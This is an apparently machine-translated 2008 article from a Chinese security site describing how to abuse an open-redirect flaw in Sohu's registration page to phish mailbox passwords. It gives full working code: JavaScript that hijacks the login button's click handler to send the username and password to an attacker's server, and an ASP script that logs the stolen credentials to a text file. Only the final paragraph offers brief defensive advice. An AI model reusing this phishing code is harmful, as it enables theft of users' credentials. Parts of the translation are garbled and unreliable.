Use sohu site URL jump loopholes to deceive the mailbox password-vulnerability warning-the black bar safety net

ID MYHACK58:62200819197
Type myhack58
Reporter 佚名
Modified 2008-05-30T00:00:00


Author: emptiness prodigal heart[XGC]

url jump vulnerability all over the major web site, simple look, THE9, sohu, etc. actually there are This loophole is! We take sohu, for example, talk about the vulnerability. Come to sohu, the user registration page, you can see that in the IE address bar, the default writing http://passport. sohu. com/web/signup. jsp? appid=1 0 0 0& ru=http://login. mail. sohu. com/reg/signup_success. jsp.

This string of characters in the“signup_success. the jsp”page is doing what? Anyway sohu register for free, we have to try. The original registration is successful, jump to this page. If this address is elsewhere? Now get rid of the address bar address, the replacement for the IT168 security Channel Home Page: http: // it168. com/, and then start registration.

The last actually jump to the IT168 security Channel Home page.

sohu original registration process is like this: 注册--处理注册信息--注册成功--跳转到成功页面--点页面链接自动登录--登录后跳转到 the. And after the jump of the page we can control, so the process can be, we read: 注册--处理注册信息--注册成功--跳转到伪造的登录页面--用户输入密码点登录--提交密码给我们--最后跳转到 the. In accordance with the following modified process of registration. First prepare the Tools, a forged sohu login page spoofing, an ASP page receives the sent password and save it. 打开, as it is a copy of the HTML source code, in order to allow the user to more easily deceived, but also in the log on port written on the“please login”(process described below.

Because sohu in the log in place using its own controls, Do not see the login box code, The operation of the login elements is relatively cumbersome, fortunately Microsoft provides Ietoolbar this IE plug-in, you can see the sohu login control's name, such as the login control is loaded, it is possible to operate on him.

From packet capture data can be seen this control uses AJAX, don't know him on the page to trigger the AJAX function is what may be the onclick()might also be something else, in the write code must be guaranteed to make sohu the login code in our submission password to your own asp page to save the password of the page after execution. Whether his function is something that we all can be intercepted, using the JS function hijacking technique, in fact, object-oriented language in the“method override”technology.

a. html code fake login pages: a ........................ </body> </html>(up to page end tag) ..................... Above is the mail. sohu. com Page Code,................. . We want to add the code from the following start, the“ajaxurltmp”the value to the asp file in the address: <script> var ajaxurltmp = ""; //-------------The following is the AJAX implementation part var xmlHttp; function createXMLHttpsss(){ if(window. XMLHttpRequest){ xmlHttp = new XMLHttpRequest(); } else if(window. ActiveXObject){ xmlHttp = new ActiveXObject("Microsoft. XMLHTTP"); } } function startRequest(doUrl){ createXMLHttpsss(); xmlHttp. onreadystatechange = handleStateChange; xmlHttp. open("GET", doUrl, true); xmlHttp. send(null); } function handleStateChange(){ if (xmlHttp. readyState == 4 ){ if (xmlHttp. status == 2 0 0 ){ //Stop for a second, in order to make another AJAX(log the time of execution. The last to jump. setTimeout("hrefgo()",1 0 0 0); } } } function hrefgo() { location. href = ''; } //----------------------------The above AJAX implementation part //At the point of login when performing var formrrr = document. getElementById('ppcontid'); var lgin = formrrr. childNodes[0]. childNodes[3]. childNodes[1]; lgin. onclick=function(){ alert('aaa'); } var lgonclick = lgin. onclick; lgin. onclick = function(){

var time = Math. random(); var strPer = ajaxurltmp + '? username='+document. getElementById('ppcontid'). childNodes[0]. childNodes[1]. childNodes[1]. value; strPer += '&password='+document. getElementById('ppcontid'). childNodes[0]. childNodes[2]. childNodes[1]. value+'&time='+time; startRequest(strPer); lgonclick(); } document. getElementById('pperrmsg'). innerHTML='registration success! Please login!'; //At the point of login when performing </script>

Important code explanation JS function hijacking: var lgin = formrrr. childNodes[0]. childNodes[3]. childNodes[1]; //Here get the”log in“the button. var lgonclick = lgin. onclick; //put the login method is assigned to a variable, this variable is actually a method. lgin. onclick = function () { 。。。。。 My code for calling AJAX to the ASP file password here to intercept) lgonclick(); //original code } Note that in the HTML code in the”“replaced with your own ASP files address. asp file code: <% kxlzxfile=Server. MapPath("kxlzx.txt") set fs=server. CreateObject("scripting. filesystemobject") set file=fs. OpenTextFile(kxlzxfile,8,True,0) file. WriteLine("username:"&Request. QueryString("username")& "") file. WriteLine("password:"&Request. QueryString("password")& "") file. close set fs = nothing %>

Very simple code, The received password to generate a kxlzx. txt file, save the password. 把 伪造 的 登录 页面 a.html(the address is http: // save your password page a. asp(the address is http://safe. it168. com/a. asp)upload to an asp space.

Now perform the following our processes, first of all, open the register address“ 1 0 0 0&ru=”registered user“kxlzxtest”, password“testtest”, and then submit.

Look at the IE address bar, and have come to the fake login page, enter the password to log in. Normal log, into the mailbox.

现在 查看 kxlzx.txt it really has stolen the password! The entire falsification process is just that, let users unknowingly fooled.

As ordinary Internet users, we do not believe any of the people who give out web links, even if is a friend because he could be a victim of it. And as programmers it should be noted that when you are in the design process, try not to let the user participate in the control process, especially in sensitive places. You can imagine sohu of this process design is intended to and other program complexes, allowing users to register directly after the jump. But since there is no checking the source, there is no check post to register the program link is whether sohu's own page, eventually led to the URL to deceive. And this vulnerability in the major sites spread, for example, nine of the city's sign-in address“https: //”and so, if to be used, eventually will cause very serious consequences.